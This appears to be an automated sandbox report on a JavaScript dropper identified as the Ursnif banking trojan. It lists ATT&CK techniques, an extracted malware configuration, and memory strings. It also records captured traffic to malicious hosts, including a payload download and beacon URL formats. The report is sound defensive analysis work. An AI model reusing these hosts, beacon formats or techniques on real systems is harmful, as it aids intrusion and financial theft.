
Analysis Report my_presentation_o6y.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:220655
Start date:06.04.2020
Start time:22:20:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 47s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:my_presentation_o6y.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winJS@19/18@4/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 67.27.159.126, 8.241.122.126, 8.248.123.254, 8.241.123.126, 67.27.157.126, 92.123.7.209, 152.199.19.161
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 5256 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy:Threshold
Score:100
Range:0 - 100
Whitelisted:false
Threat:Ursnif
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access:
  • Valid Accounts
  • Replication Through Removable Media
  • External Remote Services
  • Drive-by Compromise
  • Exploit Public-Facing Application
  • Spearphishing Link
  • Spearphishing Attachment
  • Spearphishing via Service
Execution:
  • Windows Management Instrumentation 2
  • Command-Line Interface 1
  • PowerShell 1
  • Scripting 2
  • Exploitation for Client Execution 1
  • Graphical User Interface 1
  • Scripting
  • Third-party Software
Persistence:
  • Winlogon Helper DLL
  • Port Monitors
  • Accessibility Features
  • System Firmware
  • Shortcut Modification
  • Modify Existing Service
  • Path Interception
  • Logon Scripts
Privilege Escalation:
  • Process Injection 512
  • Accessibility Features
  • Path Interception
  • DLL Search Order Hijacking
  • File System Permissions Weakness
  • New Service
  • Scheduled Task
  • Process Injection
Defense Evasion:
  • Masquerading 11
  • Software Packing 2
  • Virtualization/Sandbox Evasion 2
  • Process Injection 512
  • Scripting 2
  • Obfuscated Files or Information 2
  • DLL Side-Loading 1
  • Connection Proxy 2
Credential Access:
  • Credential Dumping
  • Network Sniffing
  • Input Capture
  • Credentials in Files
  • Account Manipulation
  • Brute Force
  • Two-Factor Authentication Interception
  • Bash History
Discovery:
  • Virtualization/Sandbox Evasion 2
  • Process Discovery 2
  • Application Window Discovery 1
  • Security Software Discovery 11
  • File and Directory Discovery 1
  • System Information Discovery 23
  • Network Sniffing
  • Network Service Scanning
Lateral Movement:
  • Remote File Copy 3
  • Remote Services
  • Windows Remote Management
  • Logon Scripts
  • Shared Webroot
  • Third-party Software
  • Pass the Hash
  • Remote Desktop Protocol
Collection:
  • Email Collection 1
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
  • Data Staged
  • Screen Capture
  • Email Collection
  • Clipboard Data
Exfiltration:
  • Data Encrypted 1
  • Exfiltration Over Other Network Medium
  • Automated Exfiltration
  • Data Encrypted
  • Scheduled Transfer
  • Data Transfer Size Limits
  • Exfiltration Over Command and Control Channel
  • Exfiltration Over Alternative Protocol
Command and Control:
  • Multi-hop Proxy 1
  • Remote File Copy 3
  • Standard Non-Application Layer Protocol 3
  • Standard Application Layer Protocol 3
  • Connection Proxy 2
  • Commonly Used Port
  • Uncommonly Used Port
  • Standard Application Layer Protocol
Network Effects:
  • Eavesdrop on Insecure Network Communication
  • Exploit SS7 to Redirect Phone Calls/SMS
  • Exploit SS7 to Track Device Location
  • SIM Card Swap
  • Manipulate Device Communication
  • Jamming or Denial of Service
  • Rogue Wi-Fi Access Points
  • Downgrade to Insecure Protocols
Remote Service Effects:
  • Remotely Track Device Without Authorization
  • Remotely Wipe Data Without Authorization
  • Obtain Device Cloud Backups
Impact:
  • Modify System Partition
  • Device Lockout
  • Delete Device Data
  • Premium SMS Toll Fraud
  • Manipulate App Store Rankings or Ratings
  • Abuse Accessibility Features
  • Data Encrypted for Impact
  • Generate Fraudulent Advertising Revenue

Signature Overview



AV Detection:

Found malware configuration
Source: regsvr32.exe.5652.4.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "300", "system": "e1aacfc175c0ccc76580dfb2735a8c76hh-", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586236904", "user": "31b341dd54c8a3b79c4b2eb58a414dc9", "hash": "0x43f98375", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: f1.pipen.at | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\TAvvi.txt | Virustotal: Detection: 15%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\TAvvi.txt | Joe Sandbox ML: detected

Cryptography:

Public key (encryption) found
Source: explorer.exe, 00000011.00000002.1204600072.0000000005BE0000.00000004.00000001.sdmp | Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: api10.dianer.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /api1/olUj7VUg1W3_2B/Cm5em_2FIcoskF811yIlL/i5nyfJyOrsWaXAKa/wBuJs4wlgM_2BIy/t7o6sF4_2BEpb09e9D/e5ZukIG8o/FlemDlH5hm_2F_2BFN0s/2ZhIljtSaDFHSFEhyew/jBOrkKF_2FTTlaXJ3G7bcb/cK8SP8_2BRVIR/lu4YunYb/C7Y1WSSkLn2bCWF59L8cx45/SfuRwGoB6R/TJl48VgwKcXEC54Kl/Bzq0fT7_2FF_/2FQVuwY6mBp/UM3AQAfl6p2rLp/cMcs9TfWup_0A_0DRyv7X/E31Y4NNdfiq4NT8k/Gaeagtq3m74H3qK/lt2GxcKXxzzH0ftWw1/79Q1BmnDc/bht_2FB HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: f1.pipen.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: f1.pipen.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/8iQXGwCpzdKMz8g3/vR1Bs0PsJjWOKd0/CgIrsJRd_2BvCvUxkm/EXOKfEHNo/sYKGsI3cQNMqIc2s8Lkt/2WJiM46ejLxs3iANNJ9/h0d_2F80v8eQI71I9xW1ix/X25fj7vexiZHH/25toGcJ2/4qCC4KWagf38YJweMGTX2yy/g2VE2_2FE4/qml86HUU6i7BR1mLC/EYgG2gZ_2BJv/tirHghlS6iC/oeDlpjoTA6Q2pQ/XDM2St3rAcudiIsIc_2B9/FXw73bdttSLdvg_0/A_0DzW3gUjl_2Fr/YsYX0XolzoV8_2Fstv/ZS_2BgcF_/2FGwEtDMf1jKkxNFe920/LlyrF9mJyINdvtY/9G_2F HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: f1.pipen.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: f1.pipen.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/fwo7DZYH_2BAKA9AO/nNoc7nnjpHEi/npqhf3GSHBr/v2V9gDEMWaip2f/WTZSyEKW70I6E_2BOGX8L/f1xas9w9a_2BQrc8/WmdaxoK73Rm87LL/JhJ_2FMMtqKcQxmhgf/S7RjNE9eu/brt07Jz86RaM4rk_2FBt/CORp_2BglkCLtmgMfGz/3bxYiCsOxAX38PGGPweCXx/7WraUC1th8DcB/U9IobK90/F0x_2BxxLQ9nLPSso3T1SD7/nbI9FZzdKq/iEddMW90JucsG5r6S/H_0A_0D7xk8S/3WhzWfKfGKz/j7q36j_2BqTV5s/7J_2FLYZ_2B1aW7EqQErh/D89Stq2I/FqlBS0nYVsijuN/m HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: f1.pipen.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: f1.pipen.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: api10.dianer.at
Found strings which match to known social media urls
Source: msapplication.xml0.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7f30eeac,0x01d60c9c</date><accdate>0x7f30eeac,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7f30eeac,0x01d60c9c</date><accdate>0x7f33635e,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7f3a9e16,0x01d60c9c</date><accdate>0x7f3a9e16,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7f3a9e16,0x01d60c9c</date><accdate>0x7f3d001e,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7f3dd1d1,0x01d60c9c</date><accdate>0x7f3dd1d1,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7f3dd1d1,0x01d60c9c</date><accdate>0x7f3dd1d1,0x01d60c9c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Apr 2020 20:21:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary data
Source: explorer.exe, 00000011.00000002.1206555129.0000000007A37000.00000004.00000001.sdmp | String found in binary or memory: http://api10.dianer.at/jvassets/xI/t64.dat
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/fwo7DZYH_2BAKA9AO/nNoc7nnjpHEi/npqhf3GSHBr/v2V9gDEMWaip2f/WTZSyEKW70I6E
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, control.exe, 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, explorer.exe, 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: msapplication.xml.7.dr | String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000011.00000002.1206555129.0000000007A37000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: msapplication.xml1.7.dr | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msapplication.xml2.7.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.dr | String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: msapplication.xml5.7.dr | String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: msapplication.xml6.7.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.dr | String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000011.00000000.1172378611.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5928, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5928, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Java / VBScript file with very long strings (likely obfuscated code)
Source: my_presentation_o6y.js | Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: TAvvi.txt.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winJS@19/18@4/1
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{2B0F9CCC-8EDA-95A0-F08F-A2992433F6DD}
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{2F15FEE7-C2C0-3909-44D3-167DB8B7AA01}
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\BMV.MdUZxGc
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
